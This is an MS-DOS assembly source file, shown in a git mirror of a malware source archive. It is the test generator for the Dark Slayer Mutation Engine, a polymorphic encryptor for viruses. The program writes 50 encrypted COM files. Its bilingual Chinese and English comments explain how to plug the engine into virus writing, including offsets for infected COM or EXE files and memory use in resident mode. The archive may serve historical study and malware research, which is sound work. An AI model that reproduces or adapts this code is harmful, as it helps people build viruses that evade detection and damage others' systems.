daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity
Files
8137a01c85a29de1886b3952e0512207c53a9679
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.dsme-gen.asm
T
vxunderground dc888afe59 Add files via upload
2021-01-12 17:41:47 -06:00

119 lines
4.2 KiB
NASM
Raw Blame History

; Dark Slayer Mutation Engine v1.0
; Written by Dark Slayer in Taiwan
DSME_GEN SEGMENT
ASSUME CS:DSME_GEN,DS:DSME_GEN
ORG 0100h
MSG_ADDR EQU OFFSET MSG-OFFSET PROC_START-0005h
EXTRN DSME:NEAR,DSME_END:NEAR
; 以下程式,除了要注意的地方有注解,其它部份自己研究
; you may get some information as following remarks
;
START:
MOV AH,09h
MOV DX,OFFSET DG_MSG
INT 21h
MOV AX,OFFSET DSME_END+000Fh ; 本程式 + DSME+000Fh 之後的位址
; 若減 0100h 則成為本程式 + DSME 的長度
; This program + DSME+000Fh address
; Minus 0100h = this program + DSME
; lengh
MOV CL,04h
SHR AX,CL
MOV BX,CS
ADD BX,AX
MOV ES,BX ; 設 ES 用來放解碼程式和被編碼資料
; 解碼程式最大為 1024 Bytes
; 若用在常駐程式時,則須注意分配的記憶體大小
; Setting ES to put decryptor and encrypted
; code.
; Decryptor maxium is 1024 bytes
; You should notice the allocation of memory
; size when you use DSME in resident mode.
MOV CX,50
DG_L0:
PUSH CX
MOV AH,3Ch
XOR CX,CX
MOV DX,OFFSET FILE_NAME
INT 21h
XCHG BX,AX
MOV BP,0100h ; 解碼程式偏移位址
; 用來寫毒時則依欲感染檔案之大小而設
; Offset where the decryption routine
; will be executed
; It depends on which kinds of files
; COM or EXE?
MOV CX,OFFSET PROC_END-OFFSET PROC_START ; 被編碼程式的長度
; encrypted code
; lengh
MOV DX,OFFSET PROC_START ; DS:DX -> 要被編碼的程式位址
; DS:DX -> Encrypted code's
; address
PUSH BX ; 保存 File handle
; keep File handle
MOV BL,00h ; COM 模式
; COM mode
CALL DSME
POP BX
MOV AH,40h ; 返回時 DS:DX = 解碼程式 + 被編碼程式的位址
INT 21h ; CX = 解碼程式 + 被編碼程式的長度,其它暫存器不變
; When returning from DSME,
; DS:DX = decryptor + encrypted code's address
; CX = lengh of decryptor + encrypted code
; Other registers won't be changed.
MOV AH,3Eh
INT 21h
PUSH CS
POP DS ; 將 DS 設回來
; restore DS
MOV BX,OFFSET FILE_NUM
INC BYTE PTR DS:[BX+0001h]
CMP BYTE PTR DS:[BX+0001h],'9'
JBE DG_L1
INC BYTE PTR DS:[BX]
MOV BYTE PTR DS:[BX+0001h],'0'
DG_L1:
POP CX
LOOP DG_L0
MOV AH,4Ch
INT 21h
FILE_NAME DB '000000'
FILE_NUM DB '00.COM',00h
DG_MSG DB 'Generates 50 DSME encrypted test files.',0Dh,0Ah,'$'
PROC_START:
MOV AH,09h
CALL $+0003h
POP DX
ADD DX,MSG_ADDR
INT 21h
INT 20h
MSG DB 'this is <DSME> test file.$'
PROC_END:
DSME_GEN ENDS
END START

Reference in New Issue View Git Blame Copy Permalink